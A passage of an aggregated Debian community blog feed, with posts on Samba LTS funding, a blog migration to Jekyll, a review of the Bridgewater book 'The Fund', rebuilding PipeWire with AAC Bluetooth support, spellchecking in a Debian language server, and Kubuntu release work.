<p>Our long term goal is to bring confidence to Samba’s upstream development
community that they can mark some releases as being supported for 5 years (or
more) and that the corresponding work will be funded by companies that benefit
from this work (because we would have already built that community).</p>
<p>If your company relies on Samba and wants to help sustain LTS versions of
Samba, please reach out to us. For companies using Debian, the simplest way is
to subscribe to our <a href="https://www.freexian.com//lts/debian/">Debian LTS offer</a> at a gold
level (or above) and let us know that you want to contribute to Samba LTS when
you send your subscription form. For others, please reach out to us at
<a href="mailto:sales@freexian.com">sales@freexian.com</a> and we will figure out a way to
contribute.</p>
<p>In the mean time, this project has been possible thanks to the current
<a href="https://www.freexian.com//lts/debian/#sponsors">LTS sponsors</a> and
<a href="https://www.freexian.com//lts/extended/">ELTS customers</a>. We hope the whole community of
Debian and Samba users
will benefit from it.</p>
<p>For any question, don’t hesitate to <a href="https://www.freexian.com/contact/">contact us</a>.</p>2024-02-26T00:00:00+00:00Freexian CollaboratorsBen Hutchings: Converted from Pyblosxom to Jekyll
https://www.decadent.org.uk/ben/blog/2024/02/25/converted-from-pyblosxom-to-jekyll.html
<p>I’ve been using Pyblosxom here for nearly 17 years, but have become
increasingly dissatisfied with having to write HTML instead of
Markdown.</p>
<p>Today I looked at upgrading my web server and discovered that
Pyblosxom was removed from Debian after Debian 10, presumably because
it wasn’t updated for Python 3.</p>
<p>I keep hearing about Jekyll as a static site generator for blogs, so I
finally investigated how to use that and how to convert my existing
entries. Fortunately it supports both HTML and Markdown (and probably
other) input formats, so this was mostly a matter of converting
metadata.</p>
<p>I have my own crappy script for drafting, publishing, and listing
blog entries, which also needed a bit of work to update, but that is
now done.</p>
<p>If all has gone to plan, you should be seeing just one new entry in
the feed but all permalinks to older entries still working.</p>2024-02-25T20:55:54+00:00Ben HutchingsRuss Allbery: Review: The Fund
https://www.eyrie.org/~eagle/reviews/books/1-250-27694-2.html
<p>Review: <cite>The Fund</cite>, by Rob Copeland</p>
<table>
<tbody><tr>
<td>Publisher:</td>
<td>St. Martin's Press</td>
</tr>
<tr>
<td>Copyright:</td>
<td>2023</td>
</tr>
<tr>
<td>ISBN:</td>
<td>1-250-27694-2</td>
</tr>
<tr>
<td>Format:</td>
<td>Kindle</td>
</tr>
<tr>
<td>Pages:</td>
<td>310</td>
</tr></tbody></table>
<p>
I first became aware of Ray Dalio when either he or his publisher
plastered advertisements for <cite>The Principles</cite> all over the San
Francisco 4th and King Caltrain station. If I recall correctly, there
were also constant radio commercials; it was a whole thing in 2017. My
brain is very good at tuning out advertisements, so my only thought at the
time was "some business guy wrote a self-help book." I think I vaguely
assumed he was a CEO of some traditional business, since that's usually
who writes heavily marketed books like this. I did not connect him with
hedge funds or Bridgewater, which I have a bad habit of confusing with
Blackwater.
</p>
<p>
<cite>The Principles</cite> turns out to be more of a laundered cult manual than
a self-help book. And therein lies a story.
</p>
<p>
Rob Copeland is currently with <cite>The New York Times</cite>, but for many
years he was the hedge fund reporter for <cite>The Wall Street Journal</cite>.
He covered, among other things, Bridgewater Associates, the enormous hedge
fund founded by Ray Dalio. <cite>The Fund</cite> is a biography of Ray Dalio
and a history of Bridgewater from its founding as a vehicle for Dalio's
advising business until 2022 when Dalio, after multiple false starts and
title shuffles, finally retired from running the company. (Maybe. Based
on the history recounted here, it wouldn't surprise me if he was back at
the helm by the time you read this.)
</p>
<p>
It is one of the wildest, creepiest, and most abusive business histories
that I have ever read.
</p>
<p>
It's probably worth mentioning, as Copeland does explicitly, that Ray
Dalio and Bridgewater hate this book and claim it's a pack of lies.
Copeland includes some of their denials (and many non-denials that sound
as good as confirmations to me) in footnotes that I found increasingly
amusing.
</p>
<blockquote><p>
A lawyer for Dalio said he "treated all employees equally, giving
people at all levels the same respect and extending them the same
perks."
</p></blockquote>
<p>
Uh-huh.
</p>
<p>
Anyway, I personally know nothing about Bridgewater other than what I
learned here and the occasional mention in Matt Levine's newsletter (which
is where I got the recommendation for this book). I have no independent
information whether anything Copeland describes here is true, but Copeland
provides the typical extensive list of notes and sourcing one expects in a
book like this, and Levine's comments indicated it's generally consistent
with Bridgewater's industry reputation. I think this book is true, but
since the clear implication is that the world's largest hedge fund was
primarily a deranged cult whose employees mostly spied on and rated each
other rather than doing any real investment work, I also have questions,
not all of which Copeland answers to my satisfaction. But more on that
later.
</p>
<p>
The center of this book are the Principles. These were an ever-changing
list of rules and maxims for how people should conduct themselves within
Bridgewater. Per Copeland, although Dalio later published a book by that
name, the version of the Principles that made it into the book was
sanitized and significantly edited down from the version used inside the
company. Dalio was constantly adding new ones and sometimes changing
them, but the common theme was radical, confrontational "honesty": never
being silent about problems, confronting people directly about anything
that they did wrong, and telling people all of their faults so that they
could "know themselves better."
</p>
<p>
If this sounds like textbook abusive behavior, you have the right idea.
This part Dalio admits to openly, describing Bridgewater as a firm that
isn't for everyone but that achieves great results because of this
culture. But the uncomfortably confrontational vibes are only the tip of
the iceberg of dysfunction. Here are just a few of the ways this played
out according to Copeland:
</p>
<ul>
<li><p>
Dalio decided that everyone's opinions should be weighted by the
accuracy of their previous decisions, to create a "meritocracy," and
therefore hired people to build a social credit system in which people
could use an app to constantly rate all of their co-workers. This
almost immediately devolved into out-group bullying worthy of a high
school, with employees hurriedly down-rating and ostracizing any
co-worker that Dalio down-rated.
</p></li>
<li><p>
When an early version of the system uncovered two employees at
Bridgewater with more credibility than Dalio, Dalio had the system
rigged to ensure that he always had the highest ratings and was not
affected by other people's ratings.
</p></li>
<li><p>
Dalio became so obsessed with the principle of confronting problems
that he created a centralized log of problems at Bridgewater and
required employees find and report a quota of ten or twenty new issues
every week or have their bonus docked. He would then regularly pick
some issue out of the issue log, no matter how petty, and treat it
like a referendum on the worth of the person responsible for the
issue.
</p></li>
<li><p>
Dalio's favorite way of dealing with a problem was to put someone on
trial. This involved extensive investigations followed by a meeting
where Dalio would berate the person and harshly catalog their flaws,
often reducing them to tears or panic attacks, while smugly insisting
that having an emotional reaction to criticism was a personality flaw.
These meetings were then filmed and added to a library available to
all Bridgewater employees, often edited to remove Dalio's personal
abuse and to make the emotional reaction of the target look
disproportionate. The ones Dalio liked the best were shown to all new
employees as part of their training in the Principles.
</p></li>
<li><p>
One of the best ways to gain institutional power in Bridgewater was to
become sycophantically obsessed with the Principles and to be an eager
participant in Dalio's trials. The highest levels of Bridgewater
featured constant jockeying for power, often by trying to catch rivals
in violations of the Principles so that they would be put on trial.
</p></li>
</ul>
<p>
In one of the common and all-too-disturbing connections between Wall
Street finance and the United States' dysfunctional government, James
Comey (yes, <a href="https://en.wikipedia.org/wiki/James_Comey">that James
Comey</a>) ran internal security for Bridgewater for three years, meaning
that he was the one who pulled evidence from surveillance cameras for
Dalio to use to confront employees during his trials.
</p>
<p>
In case the cult vibes weren't strong enough already, Bridgewater
developed its own idiosyncratic language worthy of Scientology. The
trials were called "probings," firing someone was called "sorting" them,
and rating them was called "dotting," among many other
Bridgewater-specific terms. Needless to say, no one ever probed Dalio
himself. You will also be completely unsurprised to learn that Copeland
documents instances of sexual harassment and discrimination at
Bridgewater, including some by Dalio himself, although that seems to be a
relatively small part of the overall dysfunction. Dalio was happy to
publicly humiliate anyone regardless of gender.
</p>
<p>
If you're like me, at this point you're probably wondering how Bridgewater
continued operating for so long in this environment. (Per Copeland, since
Dalio's retirement in 2022, Bridgewater has drastically reduced the
cult-like behaviors, deleted its archive of probings, and de-emphasized the
Principles.) It was not actually a religious cult; it was a hedge fund
that has to provide investment services to huge, sophisticated clients,
and by all accounts it's a very successful one. Why did this bizarre
nightmare of a workplace not interfere with Bridgewater's business?
</p>
<p>
This, I think, is the weakest part of this book. Copeland makes a few
gestures at answering this question, but none of them are very satisfying.
</p>
<p>
First, it's clear from Copeland's account that almost none of the
employees of Bridgewater had any control over Bridgewater's investments.
Nearly everyone was working on other parts of the business (sales,
investor relations) or on cult-related obsessions. Investment decisions
(largely incorporated into algorithms) were made by a tiny core of people
and often by Dalio himself. Bridgewater also appears to not trade
frequently, unlike some other hedge funds, meaning that they probably stay
clear of the more labor-intensive high-frequency parts of the business.
</p>
<p>
Second, Bridgewater took off as a hedge fund just before the hedge fund
boom in the 1990s. It transformed from Dalio's personal consulting
business and investment newsletter to a hedge fund in 1990 (with an
earlier investment from the World Bank in 1987), and the 1990s were a very
good decade for hedge funds. Bridgewater, in part due to Dalio's
connections and effective marketing via his newsletter, became one of the
largest hedge funds in the world, which gave it a sort of institutional
momentum. No one was questioned for putting money into Bridgewater even
in years when it did poorly compared to its rivals.
</p>
<p>
Third, Dalio used the tried and true method of getting free publicity from
the financial press: constantly predict an upcoming downturn, and
aggressively take credit whenever you were right. From nearly the start
of his career, Dalio predicted economic downturns year after year.
Bridgewater did very well in the 2000 to 2003 downturn, and again during
the 2008 financial crisis. Dalio aggressively takes credit for predicting
both of those downturns and positioning Bridgewater correctly going into
them. This is correct; what he avoids mentioning is that he also
predicted downturns in every other year, the majority of which never
happened.
</p>
<p>
These points together create a bit of an answer, but they don't feel like
the whole picture and Copeland doesn't connect the pieces. It seems
possible that Dalio may simply be good at investing; he reads obsessively
and clearly enjoys thinking about markets, and being an abusive cult
leader doesn't take up all of his time. It's also true that to some
extent hedge funds are semi-free money machines, in that once you have a
sufficient quantity of money and political connections you gain access to
investment opportunities and mechanisms that are very likely to make money
and that the typical investor simply cannot access. Dalio is clearly good
at making personal connections, and invested a lot of effort into forming
close ties with tricky clients such as pools of Chinese money.
</p>
<p>
Perhaps the most compelling explanation isn't mentioned directly in this
book but instead comes from Matt Levine. Bridgewater touts its
algorithmic trading over humans making individual trades, and there is
some reason to believe that consistently applying an algorithm without
regard to human emotion is a solid trading strategy in at least some
investment areas. Levine has asked in his newsletter, tongue firmly in
cheek, whether the bizarre cult-like behavior and constant infighting is a
strategy to distract all the humans and keep them from messing with the
algorithm and thus making bad decisions.
</p>
<p>
Copeland leaves this question unsettled. Instead, one comes away from
this book with a clear vision of the most dysfunctional workplace I have
ever heard of, and an endless litany of bizarre events each more
astonishing than the last. If you like watching train wrecks, this is the
book for you. The only drawback is that, unlike other entries in this
genre such as <a href="https://www.eyrie.org/~eagle/reviews/books/1-5247-3166-8.html"><cite>Bad Blood</cite></a> or
<a href="https://www.eyrie.org/~eagle/reviews/books/0-316-46134-2.html"><cite>Billion Dollar Loser</cite></a>, Bridgewater is a
wildly successful company, so you don't get the schadenfreude of seeing a
house of cards collapse. You do, however, get a helpful mental model to
apply to the next person who tries to talk to you about "radical honesty"
and "idea meritocracy."
</p>
<p>
The flaw in this book is that the existence of an organization like
Bridgewater is pointing to systematic flaws in how our society works,
which Copeland is largely uninterested in interrogating. "How could this
have happened?" is a rather large question to leave unanswered. The sheer
outrageousness of Dalio's behavior also gets a bit tiring by the end of
the book, when you've seen the patterns and are hearing about the fourth
variation. But this is still an astonishing book, and a worthy entry in
the genre of capitalism disasters.
</p>
<p>Rating: 7 out of 10</p>2024-02-25T03:46:00+00:00Russ AllberyJacob Adams: AAC and Debian
https://tookmund.com/2024/02/aac-and-debian
<p>Currently, in a default installation of Debian with the GNOME desktop,
Bluetooth headphones that require the AAC codec<sup id="fnref:apple"><a class="footnote" href="https://tookmund.com/feed.xml#fn:apple" rel="footnote">1</a></sup> cannot be used.
<a href="https://wiki.debian.org/BluetoothUser/a2dp#AAC_codec">As the Debian wiki outlines</a>,
using the AAC codec over Bluetooth, while technically supported by
PipeWire, is explicitly disabled in Debian at this time.
This is because the <code class="language-plaintext highlighter-rouge">fdk-aac</code> library needed to enable this support is currently
in the <code class="language-plaintext highlighter-rouge">non-free</code> component of the repository, meaning that PipeWire, which
is in the <code class="language-plaintext highlighter-rouge">main</code> component, cannot depend on it.</p>
<h1 id="how-to-fix-it-yourself">How to Fix it Yourself</h1>
<p>If what you, like me, need is simply for Bluetooth Audio to work with AAC
in Debian’s default desktop environment<sup id="fnref:default"><a class="footnote" href="https://tookmund.com/feed.xml#fn:default" rel="footnote">2</a></sup>,
then you’ll need to rebuild the <code class="language-plaintext highlighter-rouge">pipewire</code> package to include the
AAC codec. While the current version in Debian <code class="language-plaintext highlighter-rouge">main</code> has been built with AAC
deliberately disabled, it is trivial to enable if you can install a version
of the <code class="language-plaintext highlighter-rouge">fdk-aac</code> library.</p>
<p><strong>I preface this with the usual caveats when it comes to patent
and licensing controversies. I am not a lawyer, building this package and/or
using it could get you into legal trouble.</strong></p>
<p>These instructions have only been tested on an up-to-date copy of Debian 12.</p>
<ol>
<li>Install <code class="language-plaintext highlighter-rouge">pipewire</code>’s build dependencies
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo apt install build-essential devscripts
sudo apt build-dep pipewire
</code></pre></div> </div>
</li>
<li>Install <code class="language-plaintext highlighter-rouge">libfdk-aac-dev</code>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo apt install libfdk-aac-dev
</code></pre></div> </div>
<p>If the above doesn’t work you’ll likely need to enable non-free and try again</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo sed -i 's/main/main non-free/g' /etc/apt/sources.list
sudo apt update
</code></pre></div> </div>
<p>Alternatively, if you wish to ensure you are maximally license-compliant and
patent un-infringing<sup id="fnref:ianal"><a class="footnote" href="https://tookmund.com/feed.xml#fn:ianal" rel="footnote">3</a></sup>,
you can instead build <code class="language-plaintext highlighter-rouge">fdk-aac-free</code> which includes only those components
of AAC that are known to be patent-free<sup id="fnref:ianal:1"><a class="footnote" href="https://tookmund.com/feed.xml#fn:ianal" rel="footnote">3</a></sup>.
This is what should eventually end up in Debian to resolve this problem
(see below).</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo apt install git-buildpackage
mkdir fdk-aac-source
cd fdk-aac-source
git clone https://salsa.debian.org/multimedia-team/fdk-aac
cd fdk-aac
gbp buildpackage
sudo dpkg -i ../libfdk-aac2_*deb ../libfdk-aac-dev_*deb
</code></pre></div> </div>
</li>
<li>Get the <code class="language-plaintext highlighter-rouge">pipewire</code> source code
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mkdir pipewire-source
cd pipewire-source
apt source pipewire
</code></pre></div> </div>
<p>This will create a bunch of files within the <code class="language-plaintext highlighter-rouge">pipewire-source</code> directory,
but you’ll only need the <code class="language-plaintext highlighter-rouge">pipewire-<version></code> folder, this contains all the
files you’ll need to build the package, with all the debian-specific patches
already applied.
Note that you don’t want to run the <code class="language-plaintext highlighter-rouge">apt source</code> command as root, as it will
then create files that your regular user cannot edit.</p>
</li>
<li>Fix the dependencies and build options
To fix up the build scripts to use the fdk-aac library,
you need to save the following as <code class="language-plaintext highlighter-rouge">pipewire-source/aac.patch</code>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>--- debian/control.orig
+++ debian/control
@@ -40,8 +40,8 @@
modemmanager-dev,
pkg-config,
python3-docutils,
- systemd [linux-any]
-Build-Conflicts: libfdk-aac-dev
+ systemd [linux-any],
+ libfdk-aac-dev
Standards-Version: 4.6.2
Vcs-Browser: https://salsa.debian.org/utopia-team/pipewire
Vcs-Git: https://salsa.debian.org/utopia-team/pipewire.git
--- debian/rules.orig
+++ debian/rules
@@ -37,7 +37,7 @@
-Dauto_features=enabled \
-Davahi=enabled \
-Dbluez5-backend-native-mm=enabled \
- -Dbluez5-codec-aac=disabled \
+ -Dbluez5-codec-aac=enabled \
-Dbluez5-codec-aptx=enabled \
-Dbluez5-codec-lc3=enabled \
-Dbluez5-codec-lc3plus=disabled \
</code></pre></div> </div>
<p>Then you’ll need to run <code class="language-plaintext highlighter-rouge">patch</code> from within the <code class="language-plaintext highlighter-rouge">pipewire-<version></code> folder
created by <code class="language-plaintext highlighter-rouge">apt source</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>patch -p0 < ../aac.patch
</code></pre></div> </div>
</li>
<li>Build <code class="language-plaintext highlighter-rouge">pipewire</code>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cd pipewire-*
debuild
</code></pre></div> </div>
<p>Note that you will likely see an error from <code class="language-plaintext highlighter-rouge">debsign</code> at the end of this process,
this is harmless, you simply don’t have a GPG key set up to sign your
newly-built package<sup id="fnref:gpg-key"><a class="footnote" href="https://tookmund.com/feed.xml#fn:gpg-key" rel="footnote">4</a></sup>. Packages don’t need to be signed to be installed,
and debsign uses a somewhat non-standard signing process that dpkg does not
check anyway.</p>
</li>
</ol>
<ol>
<li>Install <code class="language-plaintext highlighter-rouge">libspa-0.2-bluetooth</code>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo dpkg -i libspa-0.2-bluetooth_*.deb
</code></pre></div> </div>
</li>
<li>Restart PipeWire and/or Reboot
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo reboot
</code></pre></div> </div>
<p>Theoretically there’s a set of services to restart here that would
get pipewire to pick up the new library, probably just pipewire itself.
But it’s just as easy to restart and ensure everything is using the correct
library.</p>
</li>
</ol>
<h1 id="why">Why</h1>
<p>This is a slightly unusual situation, as the <code class="language-plaintext highlighter-rouge">fdk-aac</code> library is licensed
under what
<a href="https://www.gnu.org/licenses/license-list.html#fdk">even the GNU project</a>
acknowledges is a free software license.
However, <a href="https://android.googlesource.com/platform/external/aac/+/master/NOTICE">this license</a>
explicitly informs the user that they need to acquire
a patent license to use this software<sup id="fnref:correction"><a class="footnote" href="https://tookmund.com/feed.xml#fn:correction" rel="footnote">5</a></sup>:</p>
<blockquote>
<p>3. NO PATENT LICENSE</p>
<p>NO EXPRESS OR IMPLIED LICENSES TO ANY PATENT CLAIMS, including without
limitation the patents of Fraunhofer, ARE GRANTED BY THIS SOFTWARE LICENSE.
Fraunhofer provides no warranty of patent non-infringement with respect to this
software.
You may use this FDK AAC Codec software or modifications thereto only for
purposes that are authorized by appropriate patent licenses.</p>
</blockquote>
<p>To quote the GNU project:</p>
<blockquote>
<p>Because of this, and because the license author is a known patent aggressor,
we encourage you to be careful about using or redistributing software under
this license: you should first consider whether the licensor might aim to
lure you into patent infringement.</p>
</blockquote>
<p>AAC is covered by a number of patents, which expire at some point in the 2030s<sup id="fnref:patentexpire"><a class="footnote" href="https://tookmund.com/feed.xml#fn:patentexpire" rel="footnote">6</a></sup>.
As such the current version of the library is potentially legally dubious to ship with
any other software, as it could be considered patent-infringing<sup id="fnref:ianal:2"><a class="footnote" href="https://tookmund.com/feed.xml#fn:ianal" rel="footnote">3</a></sup>.</p>
<h2 id="fedoras-solution">Fedora’s solution</h2>
<p>Since 2017, Fedora has included a modified version of the library
as fdk-aac-free, see the <a href="https://lists.fedoraproject.org/archives/list/devel@lists.fedoraproject.org/thread/F64JBJI2IZFT2A5QDXGHNMPALCQIVJAX/">announcement</a> and the <a href="https://bugzilla.redhat.com/show_bug.cgi?id=1501522">bugzilla bug requesting review</a>.</p>
<p>This version of the library includes only the AAC LC profile, which is believed
to be entirely patent-free<sup id="fnref:ianal:3"><a class="footnote" href="https://tookmund.com/feed.xml#fn:ianal" rel="footnote">3</a></sup>.</p>
<p>Based on this, there is an open bug report in Debian requesting that the
<a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=981285"><code class="language-plaintext highlighter-rouge">fdk-aac</code> package be moved to the main component</a>
and that the
<a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1021370"><code class="language-plaintext highlighter-rouge">pipwire</code> package be updated to build against it</a>.</p>
<h2 id="the-debian-new-queue">The Debian NEW queue</h2>
<p>To resolve these bugs, a version of <code class="language-plaintext highlighter-rouge">fdk-aac-free</code> has been uploaded to Debian
by Jeremy Bicha.
However, to make it into Debian proper, it must first pass through the
<a href="https://ftp-master.debian.org/new.html">ftpmaster’s NEW queue</a>.
The <a href="https://ftp-master.debian.org/new/fdk-aac-free_2.0.2-3.html">current version of fdk-aac-free</a>
has been in the NEW queue since July 2023.</p>
<p>Based on conversations in some of the bugs above, it’s been there since at least 2022<sup id="fnref:jbicha"><a class="footnote" href="https://tookmund.com/feed.xml#fn:jbicha" rel="footnote">7</a></sup>.</p>
<p>I hope this helps anyone stuck with AAC to get their hardware working for them
while we wait for the package to eventually make it through the NEW queue.</p>
<p><a href="https://news.ycombinator.com/item?id=39503266">Discuss on Hacker News</a></p>
<div class="footnotes">
<ol>
<li id="fn:apple">
<p>Such as, for example, any Apple AirPods, which only support AAC AFAICT. <a class="reversefootnote" href="https://tookmund.com/feed.xml#fnref:apple">↩</a></p>
</li>
<li id="fn:default">
<p>Which, as of Debian 12 is GNOME 3 under Wayland with PipeWire. <a class="reversefootnote" href="https://tookmund.com/feed.xml#fnref:default">↩</a></p>
</li>
<li id="fn:ianal">
<p>I’m not a lawyer, I don’t know what kinds of infringement might or might not be possible here, do your own research, etc. <a class="reversefootnote" href="https://tookmund.com/feed.xml#fnref:ianal">↩</a> <a class="reversefootnote" href="https://tookmund.com/feed.xml#fnref:ianal:1">↩<sup>2</sup></a> <a class="reversefootnote" href="https://tookmund.com/feed.xml#fnref:ianal:2">↩<sup>3</sup></a> <a class="reversefootnote" href="https://tookmund.com/feed.xml#fnref:ianal:3">↩<sup>4</sup></a></p>
</li>
<li id="fn:gpg-key">
<p>And if you DO have a key setup with <code class="language-plaintext highlighter-rouge">debsign</code> you almost certainly don’t need these instructions. <a class="reversefootnote" href="https://tookmund.com/feed.xml#fnref:gpg-key">↩</a></p>
</li>
<li id="fn:correction">
<p>This was originally phrased as “explicitly does not grant any patent rights.” It was <a href="https://news.ycombinator.com/item?id=39503761">pointed out on Hacker News</a> that this is not exactly what it says, as it also includes a specific note that you’ll need to acquire your own patent license. I’ve now quoted the relevant section of the license for clarity. <a class="reversefootnote" href="https://tookmund.com/feed.xml#fnref:correction">↩</a></p>
</li>
<li id="fn:patentexpire">
<p>Wikipedia claims the “base” patents expire in 2031, with the extensions expiring in 2038, but its <a href="https://hydrogenaud.io/index.php/topic,121109.0.html">source for these claims</a> is some guy’s spreadsheet in a forum. The same discussion also brings up Wikipedia’s claim and casts some doubt on it, so I’m not entirely sure what’s correct here, but I didn’t feel like doing a patent deep-dive today. If someone can provide a clear answer that would be much appreciated. <a class="reversefootnote" href="https://tookmund.com/feed.xml#fnref:patentexpire">↩</a></p>
</li>
<li id="fn:jbicha">
<p>According to Jeremy Bícha: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1021370#17 <a class="reversefootnote" href="https://tookmund.com/feed.xml#fnref:jbicha">↩</a></p>
</li>
</ol>
</div>2024-02-25T00:00:00+00:00Jacob AdamsNiels Thykier: Language Server for Debian: Spellchecking
https://people.debian.org/~nthykier/blog/2024/language-server-for-debian-spellchecking.html
<p>This is my third update on writing a language server for Debian packaging files, which
aims at providing a better developer experience for Debian packagers.</p>
<p>Lets go over what have done since the last report.</p>
<div class="section" id="semantic-token-support">
<h2>Semantic token support</h2>
<p>I have added support for what the Language Server Protocol (LSP) call semantic tokens. These
are used to provide the editor insights into tokens of interest for users. Allegedly,
this is what editors would use for syntax highlighting as well.</p>
<p>Unfortunately, <tt class="docutils literal">eglot</tt> (emacs) does not support semantic tokens, so I was not able to test
this. There is a 3-year old PR for supporting with the last update being ~3 month basically
saying "Please sign the Copyright Assignment". I pinged the GitHub issue in the hopes it will
get unstuck.</p>
<p>For good measure, I also checked if I could try it via <tt class="docutils literal">neovim</tt>. Before installing, I read
the <tt class="docutils literal">neovim</tt> docs, which helpfully listed the features supported. Sadly, I did not spot
semantic tokens among those and parked from there.</p>
<p>That was a bit of a bummer, but I left the feature in for now. If you have an LSP capable
editor that supports semantic tokens, let me know how it works for you! :)</p>
</div>
<div class="section" id="spellchecking">
<h2>Spellchecking</h2>
<p>Finally, I implemented something Otto was missing! :)</p>
<p>This stared with Paul Wise reminding me that there were Python binding for the <tt class="docutils literal">hunspell</tt>
spellchecker. This enabled me to get started with a quick prototype that spellchecked the
<tt class="docutils literal">Description</tt> fields in <tt class="docutils literal">debian/control</tt>. I also added spellchecking of comments while
I was add it.</p>
<p>The spellchecker runs with the standard <tt class="docutils literal">en_US</tt> dictionary from <tt class="docutils literal"><span class="pre">hunspell-en-us</span></tt>, which
does not have a lot of technical terms in it. Much less any of the Debian specific slang.
I spend considerable time providing a "built-in" wordlist for technical and Debian specific
slang to overcome this. I also made a "wordlist" for known Debian people that the
spellchecker did not recognise. Said wordlist is fairly short as a proof of concept, and
I fully expect it to be community maintained if the language server becomes a success.</p>
<p>My second problem was performance. As I had suspected that spellchecking was not the
fastest thing in the world. Therefore, I added a very small language server for the
<tt class="docutils literal">debian/changelog</tt>, which only supports spellchecking the textual part. Even for a
small changelog of a 1000 lines, the spellchecking takes about 5 seconds, which
confirmed my suspicion. With every change you do, the existing diagnostics hangs around
for 5 seconds before being updated. Notably, in <tt class="docutils literal">emacs</tt>, it seems that diagnostics
gets translated into an absolute character offset, so all diagnostics after the change
gets misplaced for every character you type.</p>
<p>Now, there is little I could do to speed up <tt class="docutils literal">hunspell</tt>. But I can, as always, cheat.
The way diagnostics work in the LSP is that the server listens to a set of notifications
like "document opened" or "document changed". In a response to that, the LSP can start
its diagnostics scanning of the document and eventually publish all the diagnostics to
the editor. The spec is quite clear that the server owns the diagnostics and the
diagnostics are sent as a "notification" (that is, fire-and-forgot). Accordingly, there
is nothing that prevents the server from publishing diagnostics multiple times for a
single trigger. The only requirement is that the server publishes the accumulated
diagnostics in every publish (that is, no delta updating).</p>
<p>Leveraging this, I had the language server for <tt class="docutils literal">debian/changelog</tt> scan the document and
publish once for approximately every 25 typos (diagnostics) spotted. This means you quickly
get your first result and that clears the obsolete diagnostics. Thereafter, you get
frequent updates to the remainder of the document if you do not perform any further changes.
That is, up to a predefined max of typos, so we do not overload the client for longer
changelogs. If you do any changes, it resets and starts over.</p>
<p>The only bit missing was dealing with concurrency. By default, a <tt class="docutils literal">pygls</tt> language server
is single threaded. It is not great if the language server hangs for 5 seconds everytime
you type anything. Fortunately, <tt class="docutils literal">pygls</tt> has builtin support for <tt class="docutils literal">asyncio</tt> and threaded
handlers. For now, I did an <tt class="docutils literal">async</tt> handler that <tt class="docutils literal">await</tt> after each line and setup some
manual detection to stop an obsolete diagnostics run. This means the server will fairly
quickly abandon an obsolete run.</p>
<p>Also, as a side-effect of working on the spellchecking, I fixed multiple typos in the
changelog of <tt class="docutils literal">debputy</tt>. :)</p>
</div>
<div class="section" id="follow-up-on-the-what-next-from-my-previous-update">
<h2>Follow up on the "What next?" from my previous update</h2>
<p>In my previous update, I mentioned I had to finish up my <tt class="docutils literal"><span class="pre">python-debian</span></tt> changes to
support getting the location of a token in a <tt class="docutils literal">deb822</tt> file. That was done, the MR
is now filed, and is pending review. Hopefully, it will be merged and uploaded soon. :)</p>
<p>I also submitted my proposal for a different way of handling relationship substvars to
debian-devel. So far, it seems to have received only positive feedback. I hope it stays
that way and we will have this feature soon. Guillem proposed to move some of this into
<tt class="docutils literal">dpkg</tt>, which might delay my plans a bit. However, it might be for the better in the
long run, so I will wait a bit to see what happens on that front. :)</p>
<p>As noted above, I managed to add <tt class="docutils literal">debian/changelog</tt> as a support format for the
language server. Even if it only does spellchecking and trimming of trailing newlines
on save, it technically is a new format and therefore cross that item off my list. :D</p>
<p>Unfortunately, I did not manage to write a linter variant that does not involve using
an LSP-capable editor. So that is still pending. Instead, I submitted an MR against
<tt class="docutils literal"><span class="pre">elpa-dpkg-dev-el</span></tt> to have it recognize all the fields that the <tt class="docutils literal">debian/control</tt>
LSP knows about at this time to offset the lack of semantic token support in
<tt class="docutils literal">eglot</tt>.</p>
</div>
<div class="section" id="from-here">
<h2>From here...</h2>
<p>My sprinting on this topic will soon come to an end, so I have to a bit more careful
now with what tasks I open!</p>
<p>I think I will narrow my focus to providing a batch linting interface. Ideally, with
an auto-fix for some of the more mechanical issues, where this is little doubt about
the answer.</p>
<p>Additionally, I think the spellchecking will need a bit more maturing. My current
code still trips on naming patterns that are "clearly" verbatim or code references
like things written in <tt class="docutils literal">CamelCase</tt> or <tt class="docutils literal">SCREAMING_SNAKE_CASE</tt>. That gets annoying
really quickly. It also trips on a lot of commands like <tt class="docutils literal"><span class="pre">dpkg-gencontrol</span></tt>, but that
is harder to fix since it could have been a real word. I think those will have to be
fixed people using quotes around the commands. Maybe the most popular ones will end
up in the wordlist.</p>
<p>Beyond that, I will play it by ear if I have any time left. :)</p>
</div>2024-02-24T08:45:38+00:00Niels ThykierScarlett Gately Moore: Kubuntu: Week 3 wrap up, Contest! KDE snaps, Debian uploads.
https://www.scarlettgatelymoore.dev/kubuntu-week-3-wrap-up-contest-kde-snaps-debian-uploads/
<figure class="wp-block-image size-large"><img alt="Witch Wells AZ Sunset" class="not-transparent wp-image-424" height="338" src="https://www.scarlettgatelymoore.dev/wp-content/uploads/20240101_071321-1024x338.png" width="1024" />Witch Wells AZ Sunset</figure>
<p>It has been a very busy 3 weeks here in Kubuntu!</p>
<p>Kubuntu 22.04.4 LTS has been released and can be downloaded from here: <a href="https://kubuntu.org/getkubuntu/">https://kubuntu.org/getkubuntu/</a> </p>
<p>Work done for the upcoming 24.04 LTS release:</p>
<ul>
<li>Frameworks 5.115 is in proposed waiting for the Qt transition to complete.</li>
<li>Debian merges for Plasma 5.27.10 are done, and I have confirmed there will be another bugfix release on March 6th.</li>
<li>Applications 23.08.5 is being worked on right now.</li>
<li>Added support for riscv64 hardware.</li>
<li>Bug triaging and several fixes!</li>
<li>I am working on Kubuntu branded Plasma-Welcome, Orca support and much more!</li>
<li>Aaron and the <a href="http://kfocus.org">Kfocus</a> team has been doing some amazing work getting Calamares perfected for release! Thank you!</li>
<li>Rick has been working hard on revamping kubuntu.org, stay tuned! Thank you!</li>
